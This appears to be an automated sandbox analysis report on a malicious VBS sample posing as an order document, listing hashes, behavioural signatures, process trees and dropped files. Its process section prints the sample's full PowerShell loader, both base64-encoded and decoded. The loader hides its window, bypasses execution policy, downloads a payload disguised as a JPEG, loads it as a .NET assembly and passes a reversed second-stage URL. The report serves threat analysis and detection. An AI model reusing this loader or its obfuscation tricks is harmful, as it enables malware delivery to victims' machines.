Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12-10-2023 16:28
Static task
static1
Behavioral task
behavioral1
Sample
Revised orders #0427023.vbs
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Revised orders #0427023.vbs
Resource
win10v2004-20230915-en
General
-
Target
Revised orders #0427023.vbs
-
Size
356KB
-
MD5
63285d30ad5f668be67527ec6769bbd0
-
SHA1
0ff62ee4448ba44ec1e533a675f1c87dd69be077
-
SHA256
41bb5c0cc646087944c987764fd0a1b451ba18347ac681a0feb690aba29b32e5
-
SHA512
3f44c6101829eb1437d40ba282376ac5ebff58731caada1a9089e459bf27f862346979725e050f4a4bb9400e677b6ae553619df5d9d2a7b8882cca1e95727e97
-
SSDEEP
6144:7nDNa39lLUUxHUUd05brxi0wOLF5t0sRv11rUUUUOhCfktA5RMZGByJ:3Na39lLUUxHUUd05brxi0wOLF5t0sRvQ
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2732 powershell.exe 7 2732 powershell.exe 9 2732 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1020 powershell.exe 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2968 wrote to memory of 1020 2968 WScript.exe 29 PID 2968 wrote to memory of 1020 2968 WScript.exe 29 PID 2968 wrote to memory of 1020 2968 WScript.exe 29 PID 1020 wrote to memory of 2732 1020 powershell.exe 30 PID 1020 wrote to memory of 2732 1020 powershell.exe 30 PID 1020 wrote to memory of 2732 1020 powershell.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Revised orders #0427023.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADYAMwAvADYAMgAxAC8AbwByAGkAZwBpAG4AYQBsAC8AdQBuAGkAdgBlAHIAcwBvAF8AdgBiAHMALgBqAHAAZQBnAD8AMQA2ADkAMAA5ADMAMQA4ADUANQAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQA7ACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAYQByAGcAdQBtAGUAbgB0AHMAIAA9ACAALAAoACcAdAB4AHQALgBrAHIAbwB3AC8AbQBvAGMALgBvAGMAcAB1AG8AcgBnAGEAYQB0AG8AbQBsAGEALgB3AHcAdwAvAC8AOgBwAHQAdABoACcAKQA7ACQAbQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABhAHIAZwB1AG0AZQBuAHQAcwApAA=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.krow/moc.ocpuorgaatomla.www//:ptth');$method.Invoke($null, $arguments)"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59d7d6e9a4f68c6dc1525b8bc736c1459
SHA1d08baae582250608ac55ebc2c147c244b5542b61
SHA256b0b1ae55d1cc49e92c1b6165c812044b689f82c548ea462182c78ab66f53f30d
SHA512dbad3a4c5b5cf10429127b2ed71f04626eb895795b378924f7b84bd0a78339dd482b125dd5d4aeee9272e42c9cf590b555dcb8980a057d90482803f68c60c17b
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58eb1aee19a26d4254000fe8f7f7a6d65
SHA115fb9bc6fd4d9e179c8bb003dd97398837e8f045
SHA25661979d8165e825a091988d98fb8381bc6a35a97c08fb8e60ff48ae64cf7b9521
SHA5127e137f26d37b7f9a01b1ff0b578dbbf989e8f4c0b1dfddc403aaa46d31dbbb580a1586689a778bba40c109076cfae87f9f4e30ba231f8dbbb4984e3394d62498
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AQJH5LUQBIZG8R556IYD.temp
Filesize7KB
MD58eb1aee19a26d4254000fe8f7f7a6d65
SHA115fb9bc6fd4d9e179c8bb003dd97398837e8f045
SHA25661979d8165e825a091988d98fb8381bc6a35a97c08fb8e60ff48ae64cf7b9521
SHA5127e137f26d37b7f9a01b1ff0b578dbbf989e8f4c0b1dfddc403aaa46d31dbbb580a1586689a778bba40c109076cfae87f9f4e30ba231f8dbbb4984e3394d62498